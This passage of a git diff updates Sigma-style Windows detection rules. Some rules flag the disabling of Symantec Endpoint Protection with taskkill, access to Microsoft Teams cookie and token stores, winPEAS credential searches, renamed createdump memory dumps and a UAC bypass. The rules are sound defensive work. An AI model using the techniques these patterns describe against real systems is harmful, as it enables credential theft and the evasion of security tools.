'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: selection and not 1 of filter* falsepositives: - Unknown level: medium diff --git a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml index a61e012a5..14a3ff9bf 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml @@ -7,7 +7,7 @@ status: experimental description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec -author: FLorian Roth +author: Florian Roth date: 2022/07/21 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_recon.yml b/rules/windows/process_creation/proc_creation_win_susp_recon.yml index 7af331728..5e97ea32b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_recon.yml @@ -3,6 +3,7 @@ id: aa2efee7-34dd-446e-8a37-40790a66efd7 status: experimental author: frack113 date: 2021/07/30 +modified: 2022/09/13 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md @@ -24,7 +25,9 @@ detection: - 'DOSKEY.EXE' - 'sc.exe' selection_redirect: - ParentCommandLine|contains: ' > %TEMP%\' + ParentCommandLine|contains: + - ' > %TEMP%\' + - ' > %TMP%\' condition: all of selection* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index c86ba586d..3bd4048a7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/07/20 +modified: 2022/09/21 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -73,6 +73,8 @@ detection: filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' + filter_legitimate: + CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml new file mode 100644 index 000000000..32145a719 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml @@ -0,0 +1,30 @@ +title: Renamed CreateDump Process Dump +id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory +status: experimental +references: + - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ + - https://twitter.com/bopin2020/status/1366400799199272960 +author: Florian Roth +date: 2022/09/20 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'FX_VER_INTERNALNAME_STR' + selection_cli: + CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - '.dmp' + filter: + Image|endswith: '\createdump.exe' + condition: 1 of selection* and not filter +falsepositives: + - Command lines that use the same flags +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index 831dc9d60..f2bea0cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1053.005 author: Florian Roth date: 2022/02/21 -modified: 2022/07/28 +modified: 2022/09/18 logsource: product: windows category: process_creation @@ -36,7 +36,9 @@ detection: - 'C:\Windows\Temp' - 'C:\Perflogs' filter_mixed: - - CommandLine|contains: 'update_task.xml' + - CommandLine|contains: + - 'update_task.xml' + - '/Create /TN TVInstallRestore /TR' - ParentCommandLine|contains: 'unattended.ini' condition: ( all of selection1* or all of selection2* ) and not 1 of filter* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml index e0074c19a..b728cadd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml @@ -1,4 +1,4 @@ -title: Suspicious Execution of SharpView Aka PowerView +title: Suspicious Execution of SharpView Aka PowerView id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d status: experimental description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems @@ -8,20 +8,21 @@ references: - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview date: 2021/12/10 +modified: 2022/09/27 logsource: category: process_creation product: windows detection: - sharpview: - OriginalFileName: SharpView.exe - sharpview_methods: - Commandline|contains: + selection: + - OriginalFileName: SharpView.exe + - Image|endswith: '\SharpView.exe' + - CommandLine|contains: - Get-DomainGPOUserLocalGroupMapping - Find-GPOLocation - Get-DomainGPOComputerLocalGroupMapping - Find-GPOComputerAdmin - Get-DomainObjectAcl - - Get-ObjectAcl + #- Get-ObjectAcl - Add-DomainObjectAcl - Add-ObjectAcl - Remove-DomainObjectAcl @@ -33,7 +34,7 @@ detection: - Get-WMIProcess - Get-NetProcess - Get-WMIRegProxy - - Get-Proxy + #- Get-Proxy - Get-WMIRegLastLoggedOn - Get-LastLoggedOn - Get-WMIRegCachedRDPConnection @@ -65,8 +66,8 @@ detection: - Find-InterestingFile - Find-InterestingDomainShareFile - Find-DomainObjectPropertyOutlier - - TestMethod - - Get-Domain + #- TestMethod + #- Get-Domain - Get-NetDomain - Get-DomainComputer - Get-NetComputer @@ -80,13 +81,13 @@ detection: - Get-DomainUser - Get-NetUser - Get-DomainGroup - - Get-NetGroup + #- Get-NetGroup - Get-DomainDFSShare - Get-DFSshare - Get-DomainDNSRecord - - Get-DNSRecord - - Get-DomainDNSZone - - Get-DNSZone + #- Get-DNSRecord + #- Get-DomainDNSZone + #- Get-DNSZone - Get-DomainForeignGroupMember - Find-ForeignGroup - Get-DomainForeignUser @@ -100,7 +101,7 @@ detection: - Get-DomainOU - Get-NetOU - Get-DomainSID - - Get-Forest + #- Get-Forest - Get-NetForest - Get-ForestTrust - Get-NetForestTrust @@ -117,32 +118,33 @@ detection: - Get-ForestGlobalCatalog - Get-NetForestCatalog - Get-DomainUserEvent - - Get-UserEvent + #- Get-UserEvent - Get-DomainGUIDMap - - Get-GUIDMap + #- Get-GUIDMap - Resolve-IPAddress - - Get-IPAddress + #- Get-IPAddress - ConvertTo-SID - Invoke-UserImpersonation - - Invoke-RevertToSelf + #- Invoke-RevertToSelf - Get-DomainSPNTicket - Request-SPNTicket - Get-NetComputerSiteName - - Get-SiteName + #- Get-SiteName - Get-DomainGPO - Get-NetGPO - Set-DomainObject - - Set-ADObject + #- Set-ADObject - Add-RemoteConnection - Remove-RemoteConnection - - Get-IniContent + #- Get-IniContent - Get-GptTmpl - Get-GroupsXML - Get-DomainPolicyData - Get-DomainPolicy - Get-DomainGPOLocalGroup - Get-NetGPOGroup - condition: sharpview or sharpview_methods + - Invoke-Sharefinder + condition: selection falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml index 7912a646f..911c0d961 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml @@ -11,7 +11,7 @@ tags: - attack.t1218 author: Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2019/11/12 -modified: 2022/08/23 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -32,6 +32,9 @@ detection: - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\GitHubDesktop\Update.exe --createShortcut GitHubDesktop.exe' + - CommandLine|contains|all: + - 'C:\Users\' + - '\AppData\Local\GitHubDesktop\Update.exe --processStartAndWait GitHubDesktop.exe' - CommandLine|contains|all: - 'C:\Users\' - '\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"' diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml index 55a1e537c..a25e7f125 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml @@ -7,7 +7,7 @@ references: - https://tools.thehacker.recipes/mimikatz/modules author: Florian Roth (rule), David ANDRE (additional keywords) date: 2021/12/20 -modified: 2022/04/27 +modified: 2022/09/27 logsource: category: process_creation product: windows @@ -71,6 +71,8 @@ detection: filter_vs: Image|endswith: '\PING.EXE' ParentCommandLine|contains: '\DismFoDInstall.cmd' + filter_config_mgr: + ParentImage|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' condition: all of selection* and not 1 of filter* falsepositives: - Administrative activity diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml index a7895ad42..95a4a857c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml @@ -10,6 +10,7 @@ tags: - attack.t1218.011 author: Christian Burkard date: 2021/11/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -23,6 +24,7 @@ detection: - '%AppData%' - '%LocalAppData%' - '%Temp%' + - '%tmp%' - '\AppData\' - '\Temp\' - '\Users\Public\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml index b286838b9..589daabf4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/SBousseaden/status/1139811587760562176 author: Florian Roth (rule), Samir Bousseaden (idea) date: 2019/06/17 -modified: 2021/06/29 +modified: 2021/09/28 logsource: category: process_creation product: windows @@ -18,7 +18,7 @@ detection: filter2: - Image|endswith: '\explorer.exe' - ImageFileName: 'explorer.exe' - condition: selection and not filter1 and not filter2 + condition: selection and not 1 of filter* fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml index 999d77e14..7eba3a23c 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker date: 2020/10/12 -modified: 2022/08/24 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +34,7 @@ detection: - '\Windows\Temp\' - '\AppData\Local\' - '%temp%' + - '%tmp%' - '%ProgramData%' - '%appdata%' - '%comspec%' diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml index e9ec591cf..14d2cd03e 100644 --- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml +++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/GelosSnake/status/934900723426439170 author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali date: 2017/11/27 -modified: 2022/09/07 +modified: 2022/09/20 tags: - attack.defense_evasion - attack.t1036 @@ -71,7 +71,9 @@ detection: - 'C:\Windows\WinSxS\' # - 'C:\avast! sandbox' - Image|contains: '\SystemRoot\System32\' - - Image: 'C:\Windows\explorer.exe' + - Image: + - 'C:\Windows\explorer.exe' + - 'C:\Program Files\PowerShell\7\pwsh.exe' condition: selection and not filter fields: - ComputerName diff --git a/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml new file mode 100644 index 000000000..92f6ddbbe --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml @@ -0,0 +1,27 @@ +title: Taskkill Symantec Endpoint Protection +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth +date: 2022/09/13 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'taskkill' + - ' /F ' + - ' /IM ' + - 'ccSvcHst.exe' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml new file mode 100644 index 000000000..7d72377f8 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -0,0 +1,27 @@ +title: Suspicious Command With Teams Objects Pathes +id: d2eb17db-1d39-41dc-b57f-301f6512fa75 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +modified: 2022/09/27 +logsource: + product: windows + category: process_creation +detection: + selection: + CommandLine|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|endswith: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index db964e3ad..e6e47c5e1 100644 --- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -3,6 +3,7 @@ id: 49f2f17b-b4c8-4172-a68b-d5bf95d05130 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface author: Florian Roth date: 2022/09/13 +modified: 2022/09/27 status: experimental references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html @@ -15,8 +16,8 @@ logsource: product: windows detection: selection: - Image|endswith: '\dllhost.exe' - ParentCommandLine: + ParentImage|endswith: '\dllhost.exe' + ParentCommandLine|contains: - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' filter: diff --git a/rules/windows/process_creation/proc_creation_win_ultraviewer.yml b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml new file mode 100644 index 000000000..f3781c979 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_ultraviewer.yml @@ -0,0 +1,26 @@ +title: Use of UltraViewer Remote Access Software +id: 88656cec-6c3b-487c-82c0-f73ebb805503 +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Product: UltraViewer + - Company: DucFabulous Co,ltd + - OriginalFileName: UltraViewer_Desktop.exe + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_w32tm.yml b/rules/windows/process_creation/proc_creation_win_w32tm.yml new file mode 100644 index 000000000..f3881508c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_w32tm.yml @@ -0,0 +1,30 @@ +title: Use of W32tm as Timer +id: 6da2c9f5-7c53-401b-aacb-92c040ce1215 +status: experimental +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism +references: + - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md + - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection_w32tm: + - Image|endswith: '\w32tm.exe' + - OriginalFileName: 'w32time.dll' + selection_cmd: + CommandLine|contains|all: + - '/stripchart' + - '/computer:' + - '/period:' + - '/dataonly' + - '/samples:' + condition: all of selection_* +falsepositives: + - Legitimate use +level: high # because unlikely legitimate use of that flag combination +tags: + - attack.discovery + - attack.t1124 diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml new file mode 100644 index 000000000..0afe7b43e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml @@ -0,0 +1,26 @@ +title: Weak or Abused Passwords In CLI +id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 +status: experimental +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +author: Nasreddine Bencherchali +date: 2022/09/14 +tags: + - attack.defense_evasion + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + # Add more passwords + - 'Asd123.aaaa' + - 'password123' + - '123456789' + condition: selection +falsepositives: + - Legitimate usage of the passwords by users via commandline (should be discouraged) + - Other currently unknown false positives +level: medium diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml index 38dea0b0b..92a7a55f9 100644 --- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -47,6 +47,10 @@ detection: CommandLine|contains|all: - '\AppData\Local\Packages\Microsoft.WindowsTerminal_' - '\LocalState\settings.json' + filter_vsdevcmd: + CommandLine|contains|all: + - 'C:\Program Files\Microsoft Visual Studio\' + - '\Common7\Tools\VsDevCmd.bat' condition: all of selection_* and not 1 of filter_* falsepositives: - Other legitimate "Windows Terminal" profiles diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml new file mode 100644 index 000000000..917e8fdba --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -0,0 +1,40 @@ +title: Detect Execution of winPEAS +id: 98b53e78-ebaf-46f8-be06-421aafd176d9 +status: experimental +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +author: Georg Lauenstein +date: 2022/09/19 +references: + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation +tags: + - attack.privilege_escalation + - attack.t1082 + - attack.t1087 + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection_basic: + Image|endswith: + - '\winPEASany.exe' + - '\winPEASany_ofs.exe' + - '\winPEASx64.exe' + - '\winPEASx64_ofs.exe' + - '\winPEASx86.exe' + - '\winPEASx86_ofs.exe' + selection_pe: + OriginalFileName: 'winPEAS.exe' + selection_option: + - CommandLine|endswith: + - 'serviceinfo' # Search services information + - 'applicationsinfo' # Search installed applications information + - 'windowscreds' # Search windows credentials + - 'browserinfo ' # Search browser information + - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - CommandLine|contains: '.exe browserinfo ' # Search browser information + condition: 1 of selection* +falsepositives: + - Other programs that use the same command line flags +level: high diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index c6c92af1f..3e97012a9 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -4,36 +4,50 @@ status: test description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/7 - - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html - - https://docs.microsoft.com/en-us/windows/win32/shell/launch - - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand - - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code + - https://github.com/OTRF/detection-hackathon-apt29/issues/7 + - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html + - https://docs.microsoft.com/en-us/windows/win32/shell/launch + - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand + - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code date: 2020/05/02 -modified: 2022/03/26 +modified: 2022/09/21 logsource: - product: windows - category: registry_delete + product: windows + category: registry_delete detection: - selection: - EventType: 'DeleteKey' - TargetObject|endswith: '\shell\open\command' - filter_svchost: - Image: 'C:\Windows\system32\svchost.exe' - filter_office: - Image|startswith: - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' - - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' - Image|endswith: '\OfficeClickToRun.exe' - filter_integrator: - Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' - filter_dropbox: - Image|endswith: '\Dropbox.exe' - TargetObject|startswith: 'HKCR\Dropbox.' - condition: selection and not 1 of filter_* + selection: + EventType: 'DeleteKey' + TargetObject|endswith: '\shell\open\command' + filter_svchost: + Image: 'C:\Windows\system32\svchost.exe' + filter_office: + Image|startswith: + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\' + - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\' + Image|endswith: '\OfficeClickToRun.exe' + filter_integrator: + Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe' + filter_dropbox: + Image|endswith: '\Dropbox.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\Dropbox.' + filter_wireshark: + Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\wireshark-capture-file\' + filter_opera: + Image|startswith: + - 'C:\Program Files\Opera\' + - 'C:\Program Files (x86)\Opera\' + Image|endswith: '\installer.exe' + filter_peazip: + Image|contains: 'peazip' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\PeaZip.' + condition: selection and not 1 of filter_* falsepositives: - - Unknown + - Unknown level: medium tags: - - attack.defense_evasion - - attack.t1112 + - attack.defense_evasion + - attack.t1112 diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml index a998c6b34..1fc7bde2f 100644 --- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml +++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml @@ -17,7 +17,7 @@ detection: TargetObject|endswith: '\StubPath' filter_chrome: Details|startswith: '"C:\Program Files\Google\Chrome\Application\' - Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' + Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end filter_edge: Details|startswith: - '"C:\Program Files (x86)\Microsoft\Edge\Application\' diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index fc1844066..f3cb1b87c 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs +description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2021/05/24 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.t1218 @@ -21,7 +21,11 @@ detection: TargetObject|contains: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs' - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' - condition: selection + filter: + Image: 'C:\Windows\system32\atbroker.exe' + TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' + Details: '(Empty)' + condition: selection and not filter falsepositives: - - Creation of non-default, legitimate AT. -level: high + - Creation of non-default, legitimate at usage +level: medium diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index cb1c122ea..5b66ed84b 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -5,7 +5,7 @@ description: | A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. author: frack113 date: 2021/12/30 -modified: 2022/03/26 +modified: 2022/09/18 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md @@ -24,6 +24,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_leg1: + TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' + filter_leg2: + TargetObject|contains|all: + - 'Control\Print\Environments\' + - '\Drivers\' + - '\VNC Printer' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index 8a935e286..608a3071b 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys date: 2019/10/25 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -45,6 +45,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder' + filter_realvnc: + Image: 'C:\Windows\System32\spoolsv.exe' + TargetObject|endswith: '\Print\Monitors\MONVNC\Driver' + Details: 'VNCpm.dll' condition: all of system_control_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index ad5a53caa..500836df0 100644 --- 